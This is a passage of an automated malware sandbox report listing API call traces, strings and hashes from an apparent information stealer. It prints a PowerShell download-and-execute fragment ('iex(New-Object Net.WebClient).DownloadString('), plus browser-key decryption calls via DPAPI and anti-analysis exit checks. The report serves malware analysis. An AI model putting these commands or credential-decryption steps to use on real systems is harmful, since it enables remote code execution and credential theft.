                                                        • __getptd.LIBCMT ref: 02D0CC51
                                                          • Part of subcall function 02D0C206: __getptd_noexit.LIBCMT ref: 02D0C209
                                                          • Part of subcall function 02D0C206: __amsg_exit.LIBCMT ref: 02D0C216
                                                        • __amsg_exit.LIBCMT ref: 02D0CC71
                                                        • __lock.LIBCMT ref: 02D0CC81
                                                        • InterlockedDecrement.KERNEL32(?), ref: 02D0CC9E
                                                        • free.MSVCRT ref: 02D0CCB1
                                                        • InterlockedIncrement.KERNEL32(0042B980), ref: 02D0CCC9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                        • String ID:
                                                        • API String ID: 634100517-0
                                                        • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                        • Instruction ID: 462763d418f8fa38e5cda1d3828d00f08c34eab7b070bd34a2d76685c5a59b8c
                                                        • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                        • Instruction Fuzzy Hash: B701AD31A11A25ABC721ABA5D4C475D7761FB44714F40431BE854A73F0CB246C81DFED
                                                        APIs
                                                        • strlen.MSVCRT ref: 00416F1F
                                                        • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                                          • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                                          • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                                        • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                                        • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                                          • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: strlen$MemoryProcessQueryReadVirtual
                                                        • String ID: @
                                                        • API String ID: 2950663791-2766056989
                                                        • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                        • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                                        • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                        • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                                        APIs
                                                        • strlen.MSVCRT ref: 02D07186
                                                        • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,02D07401,00000000,00420BA8,00000000,00000000), ref: 02D071B4
                                                          • Part of subcall function 02D06E37: strlen.MSVCRT ref: 02D06E48
                                                          • Part of subcall function 02D06E37: strlen.MSVCRT ref: 02D06E6C
                                                        • VirtualQueryEx.KERNEL32(02D07574,00000000,?,0000001C), ref: 02D071F9
                                                        • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D07401), ref: 02D0731A
                                                          • Part of subcall function 02D07047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 02D0705F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: strlen$MemoryProcessQueryReadVirtual
                                                        • String ID: @
                                                        • API String ID: 2950663791-2766056989
                                                        • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                        • Instruction ID: 4b277297077d286d47667d08fac2fdb19af85be75b1f46dde9ede5e317d4bc43
                                                        • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                        • Instruction Fuzzy Hash: 5851D8B1E04109ABEB04CF95D991AEFB7B6BF88300F148519F915AB390D734EE11CBA5
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: *n@$*n@
                                                        • API String ID: 1029625771-193229609
                                                        • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                        • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                                        • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                        • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                                        APIs
                                                        • lstrcat.KERNEL32(?,0064A30C), ref: 02D04A42
                                                          • Part of subcall function 02D09047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D09072
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D04A68
                                                        • lstrcat.KERNEL32(?,?), ref: 02D04A87
                                                        • lstrcat.KERNEL32(?,?), ref: 02D04A9B
                                                        • lstrcat.KERNEL32(?,0064A284), ref: 02D04AAE
                                                        • lstrcat.KERNEL32(?,?), ref: 02D04AC2
                                                        • lstrcat.KERNEL32(?,0064A2C8), ref: 02D04AD6
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02D08FF7: GetFileAttributesA.KERNEL32(00000000,?,02CF1DBB,?,?,0042565C,?,?,00420E1F), ref: 02D09006
                                                          • Part of subcall function 02D047D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02D047E7
                                                          • Part of subcall function 02D047D7: RtlAllocateHeap.NTDLL(00000000), ref: 02D047EE
                                                          • Part of subcall function 02D047D7: wsprintfA.USER32 ref: 02D0480D
                                                          • Part of subcall function 02D047D7: FindFirstFileA.KERNEL32(?,?), ref: 02D04824
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                        • String ID:
                                                        • API String ID: 2540262943-0
                                                        • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                        • Instruction ID: 82964b050112ba4c158624e79cd193e1908eb4fa288c681d55dfff9a0e175fff
                                                        • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                        • Instruction Fuzzy Hash: E13151B6940208ABDB14FBF0DCC4EE9737AEB58700F444589A345961D0EEB49B89CFA5
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                                        Strings
                                                        • <, xrefs: 00412D39
                                                        • ')", xrefs: 00412CB3
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        • API String ID: 3031569214-898575020
                                                        • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                        • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                                        • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                        • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 02CF14A5
                                                        • __aulldiv.LIBCMT ref: 02CF14BF
                                                        • __aulldiv.LIBCMT ref: 02CF14CD
                                                        • ExitProcess.KERNEL32 ref: 02CF14FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                        • String ID: @
                                                        • API String ID: 3404098578-2766056989
                                                        • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                        • Instruction ID: 412969aec2e7f26c814297c2f4e43403f4878add30e77e76385304d5359c488a
                                                        • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                        • Instruction Fuzzy Hash: 83011DB0941308FAEF50DBD0CC89B9DBB79EB44705F248449E709B72D0D7B49A458B69
                                                        APIs
                                                        • memcmp.MSVCRT(?,00421264,00000003), ref: 02CFA094
                                                          • Part of subcall function 02D0AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D0AA4D
                                                          • Part of subcall function 02D00CC7: memset.MSVCRT ref: 02D00E83
                                                          • Part of subcall function 02D00CC7: lstrcat.KERNEL32(?,00000000), ref: 02D00E9C
                                                          • Part of subcall function 02D00CC7: lstrcat.KERNEL32(?,00420D7C), ref: 02D00EAE
                                                          • Part of subcall function 02D00CC7: lstrcat.KERNEL32(?,00000000), ref: 02D00EC4
                                                          • Part of subcall function 02D00CC7: lstrcat.KERNEL32(?,00420D80), ref: 02D00ED6
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                        • memcmp.MSVCRT(?,00421114,00000003), ref: 02CFA116
                                                        • memset.MSVCRT ref: 02CFA14F
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 02CFA1A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                        • String ID: @
                                                        • API String ID: 1977917189-2766056989
                                                        • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                        • Instruction ID: 48b9ae0224e9bed0700846aeb933cd895445f8a8adfbc73a8aca6d2692ead181
                                                        • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                        • Instruction Fuzzy Hash: 84610731A00248EBCB54EFA5DD95FEDB776AF54304F408118EA0EAB6E0DBB46A05CF51
                                                        APIs
                                                        • strtok_s.MSVCRT ref: 00410DB8
                                                        • strtok_s.MSVCRT ref: 00410EFD
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02EB5D28,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: strtok_s$lstrcpylstrlen
                                                        • String ID:
                                                        • API String ID: 348468850-0
                                                        • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                        • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                                        • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                        • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                          • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                          • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                        • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                          • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                          • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                          • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                          • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                        • String ID: $"encrypted_key":"$DPAPI
                                                        • API String ID: 3731072634-738592651
                                                        • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                        • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                                        • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                        • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CodeInfoPageValidmemset
                                                        • String ID:
                                                        • API String ID: 703783727-0
                                                        • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                        • Instruction ID: f24e2fa50bbbf2b797a49a16341a259609c8b75c4e28b33dfda80b9e0dd73467
                                                        • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                        • Instruction Fuzzy Hash: 4131D320A292919ADB25CF7588D4379BFA09B06314F1882BBD885DF3E2C768CC05C762
                                                        APIs
                                                        • GetSystemTime.KERNEL32(?), ref: 02D06BD3
                                                        • sscanf.NTDLL ref: 02D06C00
                                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02D06C19
                                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02D06C27
                                                        • ExitProcess.KERNEL32 ref: 02D06C41
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Time$System$File$ExitProcesssscanf
                                                        • String ID:
                                                        • API String ID: 2533653975-0
                                                        • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                        • Instruction ID: 698d909eca7aaeb4c17fed5bb6b9f24ed51c72093d4360346c526513064a9d4c
                                                        • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                        • Instruction Fuzzy Hash: 7C21A0B5D14209AFDF08EFE4D945AEEB7BAFF48300F04452DE515A3250EB345605CB65
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                                        • RegOpenKeyExA.ADVAPI32(80000002,02EB3858,00000000,00020119,?), ref: 00417E5E
                                                        • RegQueryValueExA.ADVAPI32(?,02EBA528,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                                        • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3466090806-0
                                                        • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                        • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                                        • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                        • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D0809E
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02D080A5
                                                        • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 02D080C5
                                                        • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 02D080E6
                                                        • RegCloseKey.ADVAPI32(?), ref: 02D080F9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3225020163-0
                                                        • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                        • Instruction ID: 81b3598cb09633fde25aaaa0173d75ad2a084060134dd923dcb5567eff6d789b
                                                        • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                        • Instruction Fuzzy Hash: BE113DB5A84209BBD710CFD4DD4AFABB7B9EB05711F104219F615A7290C7755800CBA2
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D0799B
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02D079A2
                                                        • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,02D07920), ref: 02D079C2
                                                        • RegQueryValueExA.ADVAPI32(02D07920,00420AAC,00000000,00000000,?,000000FF), ref: 02D079E1
                                                        • RegCloseKey.ADVAPI32(02D07920), ref: 02D079EB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3225020163-0
                                                        • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                        • Instruction ID: 78d76dd06c9bbe569330d92826e02b568317cf9ec202ada27d35493ff0fc088c
                                                        • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                        • Instruction Fuzzy Hash: 2801F4B9A40308BFEB10DFE4DC49FAEB7B9EB48701F104559FA05A7290D6755A008F51
                                                        APIs
                                                        • StrStrA.SHLWAPI(02EB9F98,?,?,?,0041140C,?,02EB9F98,00000000), ref: 0041926C
                                                        • lstrcpyn.KERNEL32(0064AB88,02EB9F98,02EB9F98,?,0041140C,?,02EB9F98), ref: 00419290
                                                        • lstrlenA.KERNEL32(?,?,0041140C,?,02EB9F98), ref: 004192A7
                                                        • wsprintfA.USER32 ref: 004192C7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpynlstrlenwsprintf
                                                        • String ID: %s%s
                                                        • API String ID: 1206339513-3252725368
                                                        • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                        • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
